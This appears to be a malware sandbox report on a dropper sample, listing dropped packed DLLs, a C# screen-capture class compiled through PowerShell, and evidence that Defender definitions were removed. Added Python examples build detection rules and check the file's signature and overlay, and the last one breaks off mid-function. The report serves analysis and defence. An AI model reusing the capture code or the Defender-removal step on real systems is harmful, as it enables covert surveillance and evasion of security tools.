                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........tB.t'B.t'B.t'K..'@.t'..u&@.t'..q&N.t'..p&J.t'..w&F.t'..u&@.t'B.u'..t'..u&G.t'..y&C.t'..t&C.t'...'C.t'..v&C.t'RichB.t'................PE..d......d.........." ...".0................................................................`......................................... ...L....................`..............l...........................................@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):637720
                                                          Entropy (8bit):7.994077868940962
                                                          Encrypted:true
                                                          SSDEEP:12288:2VROCPPIR0z79c8aCucuAVbXiFHTiDheVoxz0u4d0M2A9UCC:2VERAc83uc1XiJly01hUCC
                                                          MD5:395332E795CB6ABACA7D0126D6C1F215
                                                          SHA1:B845BD8864CD35DCB61F6DB3710ACC2659ED9F18
                                                          SHA-256:8E8870DAC8C96217FEFF4FA8AF7C687470FBCCD093D97121BC1EAC533F47316C
                                                          SHA-512:8BC8C8C5F10127289DEDB012B636BC3959ACB5C15638E7ED92DACDC8D8DBA87A8D994AAFFC88BC7DC89CCFEEF359E3E79980DFA293A9ACAE0DC00181096A0D66
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K3...R...R...R...*&..R..@....R..@....R..@....R..@....R..D*...R...R...R.......R.......R....J..R.......R..Rich.R..........................PE..d......d.........." ...".`...0......p,.......................................p............`..........................................K..."...H.......@.......................m.......................................8..@...........................................UPX0....................................UPX1.....`.......Z..................@....rsrc....0...@.......^..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):302872
                                                          Entropy (8bit):7.986772329138341
                                                          Encrypted:false
                                                          SSDEEP:6144:ik/Qvs7yfQJYx4x9UVqHDMDNCStEQc5YmDp9Kik+V65:ikUfQJbUV2MhCwEQc5Np9zk+U5
                                                          MD5:C2556DC74AEA61B0BD9BD15E9CD7B0D6
                                                          SHA1:05EFF76E393BFB77958614FF08229B6B770A1750
                                                          SHA-256:987A6D21CE961AFEAAA40BA69859D4DD80D20B77C4CA6D2B928305A873D6796D
                                                          SHA-512:F29841F262934C810DD1062151AEFAC78CD6A42D959A8B9AC832455C646645C07FD9220866B262DE1BC501E1A9570591C0050D5D3607F1683437DEA1FF04C32B
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................................,...............,.....,.....,.y...,.....Rich..........PE..d......d.........." ...".`.......@.......P................................................`.............................................X....................P..0.......................................................@...........................................UPX0.....@..............................UPX1.....`...P...^..................@....rsrc................b..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:MSVC .res
                                                          Category:dropped
                                                          Size (bytes):652
                                                          Entropy (8bit):3.1140582735284434
                                                          Encrypted:false
                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grynAak7Ynqq8lPN5Dlq5J:+RI+ycuZhNdAakS8lPNnqX
                                                          MD5:FB2FC8E18272AD52F18208F56C5E1FC6
                                                          SHA1:63AB994B9DE7EC22ACE1486A8AC75184CDE33A2B
                                                          SHA-256:39A6B79462E7EA57FE551E2CD59C36C2EFFE8ACC6D67D6924A757D133D73A6AF
                                                          SHA-512:5CBA3A2B79E80FC5DBF7663D5EB88DB12DBDDC67AC3AD5F21FDCC6E89FF323B25E315A5F3D4650C4A804213C4204F91FF4A6BBD15EEC863B711ABB704E83259B
                                                          Malicious:false
                                                          Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...c.3.m.2.u.w.l.3...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...c.3.m.2.u.w.l.3...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1004
                                                          Entropy (8bit):4.154581034278981
                                                          Encrypted:false
                                                          SSDEEP:24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
                                                          MD5:C76055A0388B713A1EABE16130684DC3
                                                          SHA1:EE11E84CF41D8A43340F7102E17660072906C402
                                                          SHA-256:8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
                                                          SHA-512:22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
                                                          Malicious:false
                                                          Preview:.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (602), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):605
                                                          Entropy (8bit):5.32847055359316
                                                          Encrypted:false
                                                          SSDEEP:12:p37Lvkmb6KOkqe1xBkrk+ikywZlJNqWZEmwZlJNP:V3ka6KOkqeFkywZLNLEmwZLNP
                                                          MD5:AEDFC64557B6F34DD38D424B7F29C3AC
                                                          SHA1:D83F5FA2C5445D931E5D13A479B0EAF607C34FD9
                                                          SHA-256:CEA30CB802B48EAF9ABD99C363BAD4749E4E990B5FC906FB5A77509DCA24A970
                                                          SHA-512:F6F8F3AA99993D4300998C99C7D3C151805F8D83AA95BD1F5AB056034308CE137A21F8A7B0CAF713B3D4D7D715B04EB7EE9FE4D8C2EDF35E7A630276F8CC79DA
                                                          Malicious:true
                                                          Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\c3m2uwl3\c3m2uwl3.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\c3m2uwl3\c3m2uwl3.0.cs"
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):4096
                                                          Entropy (8bit):3.157698300889665
                                                          Encrypted:false
                                                          SSDEEP:48:6w7oEAtf0KhzBU/Sf6mtJ5N0ypW1ul+a3qq:INz0dmhOAwK
                                                          MD5:610AE113CAFEA9C4E817CF31B44DFF62
                                                          SHA1:C750EADDD9C7779914F21932704E899C1A537B97
                                                          SHA-256:25059A20725DD4455B81118294B8119998D7078CEC09C9FD21A701E4B29C036E
                                                          SHA-512:CF82D8F6DCAB143BC6475938325D022FF4AD3F2D30E82470414573C0F2AAEB96DA6BC925E1037ED9B5DE838460C29C592F113F64F98DF132D0F787223304FC96
                                                          Malicious:false
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Nf...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k....*...(....B.(j........9.Q...........{.........(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (705), with CRLF, CR line terminators
                                                          Category:modified
                                                          Size (bytes):1146
                                                          Entropy (8bit):5.497753934515472
                                                          Encrypted:false
                                                          SSDEEP:24:KTwZnDkId3ka6KOkqeFkywZLNLEmwZLN2Kax5DqBVKVrdFAMBJTH:mwZnDkkka6NkqeFkywZhEmwZYK2DcVKN
                                                          MD5:62E47E855EBE317D0B7608686F8641C8
                                                          SHA1:C407B10949CDA00A3E061ECCEF3DF2E2FF48D545
                                                          SHA-256:77F407B02ED6E6B26D15758154FC45CB794A1AF5014ED2427613EBF73E356387
                                                          SHA-512:7C8CFDD912411F13C8EA3FEF960B907CD4F2C9D49C9638EB048DCCE38958B203CF51A43B9BFC91A59D8E0A7163BDCD14A87572FC44F8A1F3ABE0ABA172B3F904
                                                          Malicious:false
                                                          Preview:.C:\Users\user\AppData\Local\Temp\..........> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\c3m2uwl3\c3m2uwl3.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\c3m2uwl3\c3m2uwl3.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer t
                                                          Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):97
                                                          Entropy (8bit):4.331807756485642
                                                          Encrypted:false
                                                          SSDEEP:3:lyAZFXZDLsFzAXmZrCZDL4QXAVJK4v:lyqBtoJAXmoZDL4CA1v
                                                          MD5:195D02DA13D597A52F848A9B28D871F6
                                                          SHA1:D048766A802C61655B9689E953103236EACCB1C7
                                                          SHA-256:ADE5C28A2B27B13EFB1145173481C1923CAF78648E49205E7F412A2BEFC7716A
                                                          SHA-512:1B9EDA54315B0F8DB8E43EC6E78996464A90E84DE721611647E8395DBE259C282F06FB6384B08933F8F0B452B42E23EE5A7439974ACC5F53DAD64B08D39F4146
                                                          Malicious:false
                                                          Preview:..Service Version: 0.0.0.0..Engine Version: 0.0.0.0....No engine/signature is currently loaded...
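The csc.exe command line recorded above is the shape PowerShell's Add-Type produces when it compiles inline C#: a random directory under %TEMP%, a <name>.0.cs source, /out: to a DLL of the same name, and a reference to System.Management.Automation.dll. It is what the "Dot net compiler compiles file from suspicious location" rule keys on, and the MpCmdRun.exe output that follows it ("No engine/signature is currently loaded") is the state Defender is left in once its definitions have been removed. The Python below is an added example, not part of the report or of the malware, of how a detection engineer would express both observations as rules over process-creation events. The events are constructed: the first transcribes this report's csc.exe invocation with the /R: references shortened, the second assumes the command line "MpCmdRun.exe -RemoveDefinitions -All" because the report captures only the tool's output, and the third is a benign build from a source tree for contrast.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    image: str
    parent_image: str
    command_line: str


# Constructed process-creation events (see lead-in); paths follow this report.
SAMPLE_EVENTS = [
    ProcessEvent(
        image=r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
        parent_image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        command_line=r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output '
                     r'/R:"System.dll" /out:"C:\Users\user\AppData\Local\Temp\c3m2uwl3\c3m2uwl3.dll" '
                     r'/debug- /optimize+ /warnaserror /optimize+ '
                     r'"C:\Users\user\AppData\Local\Temp\c3m2uwl3\c3m2uwl3.0.cs"',
    ),
    ProcessEvent(  # assumed command line; the report shows only MpCmdRun's output
        image=r"C:\Program Files\Windows Defender\MpCmdRun.exe",
        parent_image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        command_line=r'"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All',
    ),
    ProcessEvent(  # benign: a normal build from a project directory
        image=r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
        parent_image=r"C:\Program Files\dotnet\MSBuild.exe",
        command_line=r'csc.exe /t:library /out:"C:\src\app\bin\app.dll" "C:\src\app\Program.cs"',
    ),
]

# Directories a compiler should not be writing to or reading sources from on an endpoint.
SUSPICIOUS_DIRS = re.compile(
    r"\\(Users\\[^\\]+\\AppData\\Local\\Temp|Windows\\Temp|Users\\Public|ProgramData)\\", re.I)
# csc/vbc options whose value is a path.
OPTION_PREFIX = re.compile(r"^/(out|r|reference|res|win32res|recurse):", re.I)


def tokens(cmd):
    """Split a Windows command line on whitespace, honouring double quotes."""
    return [(quoted or bare).replace('"', "") for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', cmd)]


def compiler_paths(cmd):
    """Absolute paths named on a csc.exe/vbc.exe command line, option prefixes stripped."""
    paths = []
    for tok in tokens(cmd):
        tok = OPTION_PREFIX.sub("", tok)
        if re.match(r"^[a-z]:\\", tok, re.I):
            paths.append(tok)
    return paths


def detect(ev):
    """Return a list of findings (possibly empty) for one process-creation event."""
    findings = []
    image = ev.image.lower()
    parent_ps = ev.parent_image.lower().endswith(("\\powershell.exe", "\\pwsh.exe"))
    if image.endswith(("\\csc.exe", "\\vbc.exe")):
        hits = [p for p in compiler_paths(ev.command_line)
                if SUSPICIOUS_DIRS.search(p) and p.lower().endswith((".cs", ".vb", ".dll"))]
        if hits:
            findings.append({"rule": "csc_compile_from_suspicious_location",
                             "paths": hits, "parent_is_powershell": parent_ps})
    if image.endswith("\\mpcmdrun.exe") and "-removedefinitions" in ev.command_line.lower():
        findings.append({"rule": "defender_definitions_removed",
                         "paths": [], "parent_is_powershell": parent_ps})
    return findings


def triage(events):
    """Rule names fired across a batch of events, in event order."""
    return [f["rule"] for ev in events for f in detect(ev)]


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        for f in detect(ev):
            print(f["rule"], "| parent is PowerShell:", f["parent_is_powershell"], "|", f["paths"])
```

The Add-Type rule deliberately inspects the /out: target and the .cs source rather than the parent process alone: legitimate PowerShell modules also call Add-Type, but a compile whose artifacts all live under %TEMP% and whose parent is an interactive or encoded PowerShell session is the combination worth alerting on, and the parent flag lets the SIEM rank it.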
                                                          File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                          Entropy (8bit):7.9923255929664
                                                          TrID:
                                                          • Win64 Executable GUI (202006/5) 92.65%
                                                          • Win64 Executable (generic) (12005/4) 5.51%
                                                          • Generic Win/DOS Executable (2004/3) 0.92%
                                                          • DOS Executable Generic (2002/1) 0.92%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
                                                          File size:7'266'369 bytes
                                                          MD5:030c3c535b2d8f10ceaeede6e3fe23f2
                                                          SHA1:032ef2c8e717960d9b49dd7e48e4fc761cb4cfed
                                                          SHA256:e57e596af8f957f936d2a698b1a66697a1a7390eadb08af386060130d342db2d
                                                          SHA512:86499b8990f5f591927c7bdf6af18fe74400812104661ac870409ac5025cecc2bf29c890046f961d69b3a00c632bf6f05ac6b501e4b832769ba2f46258c29e35
                                                          SSDEEP:98304:bFzHqdVfB2FS27wbuyuT/9vUIdD9C+z3zO917vOTh+ezDNh7xvmJ1nmOBN9n4mp3:b5QsJbT/9bvLz3S1bA3zgn97v3
                                                          TLSH:3D7633AAA3C149F5E477863DC2C28905DAB075270364DACB03F4A6B21F17ED58D3BB52
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................................-.....................,.............................................................Rich...........
                                                          Icon Hash:00928e8e8686b000
                                                          Entrypoint:0x14000c330
                                                          Entrypoint Section:.text
                                                          Digitally signed:true
                                                          Imagebase:0x140000000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x65FE458B [Sat Mar 23 02:59:23 2024 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:5
                                                          OS Version Minor:2
                                                          File Version Major:5
                                                          File Version Minor:2
                                                          Subsystem Version Major:5
                                                          Subsystem Version Minor:2
                                                          Import Hash:1af6c885af093afc55142c2f1761dbe8
                                                          Signature Valid:false
                                                          Signature Issuer:CN=Sectigo Public Code Signing CA EV R36, O=Sectigo Limited, C=GB
Signature Validation Error:The digital signature of the object did not verify
Error Number:-2146869232 (as an HRESULT this is 0x80096010, TRUST_E_BAD_DIGEST: the file's Authenticode hash does not match the hash inside the signed blob, so the Sectigo EV certificate chain below, issued to Akeo Consulting, is no evidence of this file's origin; the signature block was either lifted from a different, legitimately signed binary or the file was modified after signing)
                                                          Not Before, Not After
                                                          • 29/09/2021 01:00:00 29/09/2024 00:59:59
                                                          Subject Chain
                                                          • CN=Akeo Consulting, O=Akeo Consulting, S=Donegal, C=IE, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=IE, SERIALNUMBER=407950
                                                          Version:3
                                                          Thumbprint MD5:5C82B2D08EFE6EE0794B52D4309C5F37
                                                          Thumbprint SHA-1:3DBC3A2A0E9CE8803B422CFDBC60ACD33164965D
                                                          Thumbprint SHA-256:60E992275CC7503A3EBA5D391DB8AEAAAB001402D49AEA3F7F5DA3706DF97327
                                                          Serial:00BFB15001BBF592D4962A7797EA736FA3
Instruction (entrypoint disassembly; the report decodes this PE32+ image as 32-bit code, so each leading "dec eax" is the byte 0x48, the REX.W prefix, and "dec eax / sub esp, 28h" is really "sub rsp, 28h" with 64-bit register operands throughout)
                                                          dec eax
                                                          sub esp, 28h
                                                          call 00007F8E64B8912Ch
                                                          dec eax
                                                          add esp, 28h
                                                          jmp 00007F8E64B88D4Fh
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          dec eax
                                                          sub esp, 28h
                                                          call 00007F8E64B896A4h
                                                          test eax, eax
                                                          je 00007F8E64B88EF3h
                                                          dec eax
                                                          mov eax, dword ptr [00000030h]
                                                          dec eax
                                                          mov ecx, dword ptr [eax+08h]
                                                          jmp 00007F8E64B88ED7h
                                                          dec eax
                                                          cmp ecx, eax
                                                          je 00007F8E64B88EE6h
                                                          xor eax, eax
                                                          dec eax
                                                          cmpxchg dword ptr [000351BCh], ecx
                                                          jne 00007F8E64B88EC0h
                                                          xor al, al
                                                          dec eax
                                                          add esp, 28h
                                                          ret
                                                          mov al, 01h
                                                          jmp 00007F8E64B88EC9h
                                                          int3
                                                          int3
                                                          int3
                                                          dec eax
                                                          sub esp, 28h
                                                          test ecx, ecx
                                                          jne 00007F8E64B88ED9h
                                                          mov byte ptr [000351A5h], 00000001h
                                                          call 00007F8E64B894B1h
                                                          call 00007F8E64B89AB8h
                                                          test al, al
                                                          jne 00007F8E64B88ED6h
                                                          xor al, al
                                                          jmp 00007F8E64B88EE6h
                                                          call 00007F8E64B97A1Fh
                                                          test al, al
                                                          jne 00007F8E64B88EDBh
                                                          xor ecx, ecx
                                                          call 00007F8E64B89AC8h
                                                          jmp 00007F8E64B88EBCh
                                                          mov al, 01h
                                                          dec eax
                                                          add esp, 28h
                                                          ret
                                                          int3
                                                          int3
                                                          inc eax
                                                          push ebx
                                                          dec eax
                                                          sub esp, 20h
                                                          cmp byte ptr [0003516Ch], 00000000h
                                                          mov ebx, ecx
                                                          jne 00007F8E64B88F39h
                                                          cmp ecx, 01h
                                                          jnbe 00007F8E64B88F3Ch
                                                          call 00007F8E64B8961Ah
                                                          test eax, eax
                                                          je 00007F8E64B88EFAh
                                                          test ebx, ebx
                                                          jne 00007F8E64B88EF6h
                                                          dec eax
                                                          lea ecx, dword ptr [00035156h]
                                                          call 00007F8E64B97812h
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3e094 | 0x78 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x47000 | 0x944 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x43000 | 0x2304 | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x6ebbf9 | 0x2448 | (none: for this entry the value is a file offset, not an RVA; the certificate table is never mapped)
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x48000 | 0x758 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3b440 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x3b300 | 0x140 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2c000 | 0x420 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x2adb0 | 0x2ae00 | 75d19a4940b1c41e95d0f65f35d07455 | False | 0.5456735149416909 | data | 6.502519008894634 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x2c000 | 0x12ebc | 0x13000 | 0cf19f6ad5be1ba2b4a4b3f42e838817 | False | 0.515393708881579 | data | 5.816356361767986 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x3f000 | 0x33b8 | 0xe00 | c77d6acf176d4b487ea671c3fd3a6945 | False | 0.13392857142857142 | firmware 32a2 vdf2d (revision 2569732096) \377\377\377\377 , version 256.0.512, 0 bytes or less, at 0xcd5d20d2 1725235199 bytes , at 0 0 bytes , at 0xffffffff 16777216 bytes (libmagic misidentification of ordinary initialized data) | 1.828047079050098 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x43000 | 0x2304 | 0x2400 | f9c9a5a34be2cb8fd1246f51c7b22c72 | False | 0.4797092013888889 | data | 5.38202672986895 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
_RDATA | 0x46000 | 0x1f4 | 0x200 | 4ec0234c233e8c5ae54cd80f9630ff86 | False | 0.525390625 | data | 3.698330622853966 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x47000 | 0x944 | 0xa00 | 30edc79cb3b52956b6a45d27978d1b89 | False | 0.425 | data | 5.117264574383496 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x48000 | 0x758 | 0x800 | f1d633c1708caf707b59b5e59d6f78b3 | False | 0.54443359375 | data | 5.24651730799357 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
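Two checks a practitioner would run on the header, signature and section numbers above, written here as an added Python example that is not part of the Joe Sandbox report: the signed error number from the signature block renders as 0x80096010 (TRUST_E_BAD_DIGEST), so the Authenticode hash of this file does not match the signed one; and summing the raw section sizes puts the end of section data near file offset 0x42800 while the certificate table starts at 0x6ebbf9 and ends exactly at the file size, so about 96% of the 7.27 MB file is overlay sitting between the last section and the appended signature. That overlay is also why the whole-file entropy (7.99) is far above every section's (at most 6.50): the sections are a few percent of the file, so the excess randomness must come from compressed or encrypted data outside them. The section values are transcribed from the tables above; the 0x400 header size and 0x200 file alignment are assumptions, because the report lists virtual addresses and raw sizes but no raw offsets; the Shannon-entropy helper reproduces the report's "Entropy (8bit)" metric on constructed byte strings.

```python
import math
from collections import Counter

# Values transcribed from this report's header, signature block and section table
# (constructed input for the example; hex as printed by Joe Sandbox).
FILE_SIZE = 7_266_369
FILE_ENTROPY = 7.9923255929664
SIGNATURE_ERROR = -2146869232           # "Error Number" in the signature block
SECURITY_DIR = (0x6EBBF9, 0x2448)       # IMAGE_DIRECTORY_ENTRY_SECURITY: file offset, size
SECTIONS = [  # name, virtual address, virtual size, raw size, entropy (8 bit)
    (".text",  0x1000,  0x2ADB0, 0x2AE00, 6.502519008894634),
    (".rdata", 0x2C000, 0x12EBC, 0x13000, 5.816356361767986),
    (".data",  0x3F000, 0x33B8,  0xE00,   1.828047079050098),
    (".pdata", 0x43000, 0x2304,  0x2400,  5.38202672986895),
    ("_RDATA", 0x46000, 0x1F4,   0x200,   3.698330622853966),
    (".rsrc",  0x47000, 0x944,   0xA00,   5.117264574383496),
    (".reloc", 0x48000, 0x758,   0x800,   5.24651730799357),
]
# Assumptions: the report lists no raw offsets, so take the usual MSVC layout of a
# 0x400-byte header block followed by sections packed contiguously at 0x200 alignment.
HEADERS_RAW_SIZE = 0x400
FILE_ALIGNMENT = 0x200
TRUST_E_BAD_DIGEST = 0x80096010


def hresult(error_number):
    """The report prints the WinVerifyTrust result as a signed 32-bit int; view it as an HRESULT."""
    return error_number & 0xFFFFFFFF


def end_of_section_data(sections, headers=HEADERS_RAW_SIZE, align=FILE_ALIGNMENT):
    """File offset just past the last section's raw data (assumed contiguous, aligned layout)."""
    offset = headers
    for _name, _va, _vsize, raw_size, _entropy in sections:
        offset = (offset + raw_size + align - 1) // align * align
    return offset


def overlay_report(sections, file_size, security_dir):
    """Locate the overlay: bytes between the last section and the certificate table.
    The loader never maps them, so they carry no code the PE header describes."""
    sec_offset, sec_size = security_dir
    data_end = end_of_section_data(sections)
    return {
        "data_end": data_end,
        "overlay_bytes": sec_offset - data_end,
        "overlay_fraction": (sec_offset - data_end) / file_size,
        "signature_at_eof": sec_offset + sec_size == file_size,
    }


def shannon_entropy(data):
    """Bits per byte: 0.0 for a constant stream, 8.0 for uniform bytes (the report's 'Entropy (8bit)')."""
    n = len(data)
    if n == 0:
        return 0.0
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def entropy_explained_by_sections(sections, file_entropy):
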